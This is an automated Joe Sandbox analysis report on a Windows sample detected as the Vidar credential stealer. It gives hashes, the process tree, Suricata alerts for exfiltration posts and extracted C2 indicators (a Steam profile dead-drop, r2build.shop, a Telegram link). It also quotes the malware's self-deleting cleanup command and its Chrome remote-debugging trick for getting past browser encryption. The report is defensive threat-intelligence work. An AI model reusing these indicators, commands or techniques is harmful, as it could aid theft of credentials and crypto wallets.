Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DyM4yXX.exe

Overview

General Information

Sample name:DyM4yXX.exe
Analysis ID:1586677
MD5:67b35433e066311e95419af40384dd92
SHA1:07f235c346f8e9ead0342f0249ff4f2ca0a9dd79
SHA256:ef35b2565f53ea0320bf89a40de1589cf72ee363539da934c921d8b9ebccd7a3
Tags:Clipbankerexemalwaretrojanuser-Joker
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DyM4yXX.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\DyM4yXX.exe" MD5: 67B35433E066311E95419AF40384DD92)
    • BitLockerToGo.exe (PID: 3428 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 1148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,7943810038441131644,12745396479495106010,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 7664 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\riwlf" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7724 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1980406859.0000000009D92000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000003.2047747108.0000000000771000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 3428JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Browser Started with Remote Debugging
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3428, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 1148, ProcessName: chrome.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T14:01:35.721617+010020442471Malware Command and Control Activity Detected94.130.191.182443192.168.2.449740TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T14:01:37.083388+010020518311Malware Command and Control Activity Detected94.130.191.182443192.168.2.449741TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T14:01:34.401861+010020490871A Network Trojan was detected192.168.2.44973994.130.191.182443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T14:01:33.015464+010028593781Malware Command and Control Activity Detected192.168.2.44973894.130.191.182443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: DyM4yXX.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://r2build.shop/:Avira URL Cloud: Label: malware
            Source: https://r2build.shop/1Avira URL Cloud: Label: malware
            Source: https://r2build.shop/geAvira URL Cloud: Label: malware
            Source: https://r2build.shopAvira URL Cloud: Label: malware
            Source: https://r2build.shop/~Avira URL Cloud: Label: malware
            Source: https://r2build.shop/(Avira URL Cloud: Label: malware
            Source: https://r2build.shop/vAvira URL Cloud: Label: malware
            Source: https://r2build.shop/XAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000003.1981304256.0000000009B94000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}
            Multi AV Scanner detection for submitted file
            Source: DyM4yXX.exeReversingLabs: Detection: 21%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DyM4yXX.exeJoe Sandbox ML: detected
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048C009 CryptUnprotectData,4_2_0048C009
            Source: DyM4yXX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 94.130.191.182:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: DyM4yXX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: DyM4yXX.exe, 00000000.00000003.1980811552.0000000009C84000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: DyM4yXX.exe, 00000000.00000003.1980811552.0000000009C84000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049008C FindFirstFileA,4_2_0049008C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A91EA FindFirstFileA,4_2_004A91EA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A8248 FindFirstFileA,4_2_004A8248
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AA4E5 FindFirstFileA,4_2_004AA4E5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048E749 FindFirstFileA,4_2_0048E749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048177C FindFirstFileA,4_2_0048177C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00492AC9 FindFirstFileA,4_2_00492AC9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048CCEA FindFirstFileA,4_2_0048CCEA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ABD1E FindFirstFileA,4_2_004ABD1E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004818DA FindFirstFileA,4_2_004818DA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A8DDA GetLogicalDriveStringsA,4_2_004A8DDA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: chrome.exeMemory has grown: Private usage: 8MB later: 41MB

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49738 -> 94.130.191.182:443
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49739 -> 94.130.191.182:443
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.191.182:443 -> 192.168.2.4:49741
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.191.182:443 -> 192.168.2.4:49740
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199816275252
            Source: global trafficHTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.39
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.39
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.39
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.39
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048A09E recv,4_2_0048A09E
            Source: global trafficHTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: r2build.shopConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
            Source: chrome.exe, 00000005.00000003.2101936079.0000056000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101204697.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102001355.00000560003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: chrome.exe, 00000005.00000003.2101936079.0000056000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101204697.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102001355.00000560003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: r2build.shop
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: apis.google.com
            Source: global trafficDNS traffic detected: DNS query: play.google.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----16890r168glf3ekf37qiUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: r2build.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
            Source: chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
            Source: chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
